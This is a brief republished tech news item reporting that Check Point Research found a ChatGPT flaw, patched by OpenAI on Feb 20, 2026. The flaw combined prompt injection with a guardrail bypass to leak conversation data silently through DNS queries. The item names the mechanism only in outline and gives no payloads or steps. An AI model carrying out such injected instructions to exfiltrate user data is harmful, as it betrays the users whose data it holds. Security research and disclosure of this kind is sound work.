‘A hard truth for the AI era: don’t assume AI tools are secure by default’: OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing



  • Check Point Research found ChatGPT flaw enabling silent data exfiltration via DNS abuse and prompt injection
  • Vulnerability allowed attackers to bypass guardrails and steal sensitive user data through covert domain queries
  • OpenAI patched issue on Feb 20, 2026, marking second major fix that week after Codex command injection flaw

OpenAI has addressed a vulnerability in ChatGPT which allowed threat actors to silently exfiltrate sensitive data from their targets.

The vulnerability was discovered by security experts from Check Point Research (CPR), who warned the bug combined old-fashioned prompt injections with a bypass of built-in guardrails, noting, “AI tools should not be assumed secure by default”.





Source link

The post ‘A hard truth for the AI era: don’t assume AI tools are secure by default’: OpenAI patches flaw allowing silent data leakage from ChatGPT conversations without users ever knowing first appeared on TechToday.

This post originally appeared on TechToday.

Leave a Reply

Your email address will not be published. Required fields are marked *